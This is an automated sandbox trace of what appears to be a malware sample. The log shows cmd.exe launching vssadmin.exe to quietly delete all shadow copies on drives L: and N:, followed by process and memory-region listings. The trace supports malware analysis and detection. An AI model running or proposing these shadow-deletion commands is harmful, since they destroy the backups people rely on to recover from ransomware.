	[0285.960] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0285.960] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0285.961] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0285.962] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0285.963] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0285.964] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0285.965] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0285.966] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0285.967] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0285.967] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0285.967] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0285.967] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0285.968] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0285.968] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0285.969] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0285.970] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0285.971] GetProcessHeap () returned 0x46f0000
	[0285.971] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x210) returned 0x46f9108
	[0285.971] GetProcessHeap () returned 0x46f0000
	[0285.971] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x64) returned 0x46f9320
	[0285.971] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0285.972] GetProcessHeap () returned 0x46f0000
	[0285.972] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x418) returned 0x46f05c8
	[0285.973] SetErrorMode (uMode=0x0) returned 0x0
	[0285.973] SetErrorMode (uMode=0x1) returned 0x0
	[0285.973] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46f05d0, lpFilePart=0x18eef4 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18eef4*="Desktop") returned 0x1d
	[0285.973] SetErrorMode (uMode=0x0) returned 0x1
	[0285.974] GetProcessHeap () returned 0x46f0000
	[0285.974] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f05c8, Size=0x56) returned 0x46f05c8
	[0285.974] GetProcessHeap () returned 0x46f0000
	[0285.974] RtlSizeHeap (HeapHandle=0x46f0000, Flags=0x0, MemoryPointer=0x46f05c8) returned 0x56
	[0285.974] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0285.974] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0285.975] GetProcessHeap () returned 0x46f0000
	[0285.975] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x182) returned 0x46f9390
	[0285.975] GetProcessHeap () returned 0x46f0000
	[0285.975] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x2fc) returned 0x46f0628
	[0286.075] GetProcessHeap () returned 0x46f0000
	[0286.075] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f0628, Size=0x184) returned 0x46f0628
	[0286.075] GetProcessHeap () returned 0x46f0000
	[0286.075] RtlSizeHeap (HeapHandle=0x46f0000, Flags=0x0, MemoryPointer=0x46f0628) returned 0x184
	[0286.075] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0286.075] GetProcessHeap () returned 0x46f0000
	[0286.075] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xe0) returned 0x46f9520
	[0286.082] GetProcessHeap () returned 0x46f0000
	[0286.082] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f9520, Size=0x76) returned 0x46f9520
	[0286.082] GetProcessHeap () returned 0x46f0000
	[0286.082] RtlSizeHeap (HeapHandle=0x46f0000, Flags=0x0, MemoryPointer=0x46f9520) returned 0x76
	[0286.084] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0286.084] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec80) returned 0xffffffff
	[0286.085] GetLastError () returned 0x2
	[0286.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0286.086] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec80) returned 0xffffffff
	[0286.087] GetLastError () returned 0x2
	[0286.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0286.087] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec80) returned 0x46f95a0
	[0286.088] GetProcessHeap () returned 0x46f0000
	[0286.088] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x0, Size=0x14) returned 0x46f7990
	[0286.088] FindClose (in: hFindFile=0x46f95a0 | out: hFindFile=0x46f95a0) returned 1
	[0286.088] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec80) returned 0xffffffff
	[0286.089] GetLastError () returned 0x2
	[0286.089] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec80) returned 0x46f95a0
	[0286.089] GetProcessHeap () returned 0x46f0000
	[0286.089] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f7990, Size=0x4) returned 0x46f7520
	[0286.089] FindClose (in: hFindFile=0x46f95a0 | out: hFindFile=0x46f95a0) returned 1
	[0286.090] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0286.090] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0286.090] GetConsoleTitleW (in: lpConsoleTitle=0x18f174, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0286.513] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f0a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f084 | out: lpAttributeList=0x18f0a0, lpSize=0x18f084) returned 1
	[0286.513] UpdateProcThreadAttribute (in: lpAttributeList=0x18f0a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f08c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f0a0, lpPreviousValue=0x0) returned 1
	[0286.522] GetStartupInfoW (in: lpStartupInfo=0x18f0d8 | out: lpStartupInfo=0x18f0d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0286.523] GetProcessHeap () returned 0x46f0000
	[0286.523] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x18) returned 0x46f7a30
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0286.523] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0286.524] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0286.525] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0286.526] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0286.526] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0286.526] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0286.526] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0286.526] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0286.526] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0286.526] GetProcessHeap () returned 0x46f0000
	[0286.526] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46f7a30) returned 1
	[0286.526] GetProcessHeap () returned 0x46f0000
	[0286.526] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xa) returned 0x46f7530
	[0286.526] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0286.533] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=L: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f028*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=L: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f074 | out: lpCommandLine="vssadmin  Delete Shadows /For=L: /All /Quiet ", lpProcessInformation=0x18f074*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x238, dwThreadId=0x1124)) returned 1
	[0286.559] CloseHandle (hObject=0xa4) returned 1
	[0286.559] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0286.559] GetProcessHeap () returned 0x46f0000
	[0286.559] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fadf0) returned 1
	[0286.559] GetEnvironmentStringsW () returned 0x46fa248*
	[0286.559] GetProcessHeap () returned 0x46f0000
	[0286.559] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xb9c) returned 0x46fadf0
	[0286.559] memcpy (in: _Dst=0x46fadf0, _Src=0x46fa248, _Size=0xb9c | out: _Dst=0x46fadf0) returned 0x46fadf0
	[0286.559] FreeEnvironmentStringsA (penv="=") returned 1
	[0286.559] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0306.446] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f00c | out: lpExitCode=0x18f00c*=0x2) returned 1
	[0306.447] CloseHandle (hObject=0xa8) returned 1
	[0306.448] _vsnwprintf (in: _Buffer=0x18f0f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f014 | out: _Buffer="00000002") returned 8
	[0306.450] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0306.451] GetProcessHeap () returned 0x46f0000
	[0306.451] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fadf0) returned 1
	[0306.451] GetEnvironmentStringsW () returned 0x46fa248*
	[0306.451] GetProcessHeap () returned 0x46f0000
	[0306.452] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xbc2) returned 0x46fc568
	[0306.452] memcpy (in: _Dst=0x46fc568, _Src=0x46fa248, _Size=0xbc2 | out: _Dst=0x46fc568) returned 0x46fc568
	[0306.452] FreeEnvironmentStringsA (penv="=") returned 1
	[0306.452] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0306.452] GetProcessHeap () returned 0x46f0000
	[0306.452] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fc568) returned 1
	[0306.452] GetEnvironmentStringsW () returned 0x46fa248*
	[0306.452] GetProcessHeap () returned 0x46f0000
	[0306.452] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xbc2) returned 0x46fc568
	[0306.453] memcpy (in: _Dst=0x46fc568, _Src=0x46fa248, _Size=0xbc2 | out: _Dst=0x46fc568) returned 0x46fc568
	[0306.453] FreeEnvironmentStringsA (penv="=") returned 1
	[0306.453] GetProcessHeap () returned 0x46f0000
	[0306.453] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46f7530) returned 1
	[0306.453] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f0a0 | out: lpAttributeList=0x18f0a0) 
	[0306.453] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0306.453] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0306.569] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0306.569] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0306.968] _get_osfhandle (_FileHandle=0) returned 0x38
	[0306.968] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0307.110] SetConsoleInputExeNameW () returned 0x1
	[0307.110] GetConsoleOutputCP () returned 0x1b5
	[0307.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0307.156] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0307.321] exit (_Code=2) 

Thread:
	id = 323
	os_tid = 0x7a0


Process:
	id = "53"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2daf1000"
	os_pid = "0xbd0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "47"
	os_parent_pid = "0x10a4"
	cmd_line = "vssadmin  Delete Shadows /For=N: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3942
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3943
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3944
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3945
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3946
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 3947
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 3948
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 3949
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 3950
	        start_va = 0x690000
	          end_va = 0x691fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 3951
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 3952
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 3953
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3954
	        start_va = 0x7f090000
	          end_va = 0x7f0b2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f090000"
	        filename = ""

Region:
	              id = 3955
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3956
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3957
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3958
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3959
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3963
	        start_va = 0x400000
	          end_va = 0x58ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 3964
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3973
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3974
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3975
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3991
	        start_va = 0x6a0000
	          end_va = 0x83ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006a0000"
	        filename = ""

Region:
	              id = 3992
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4003
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
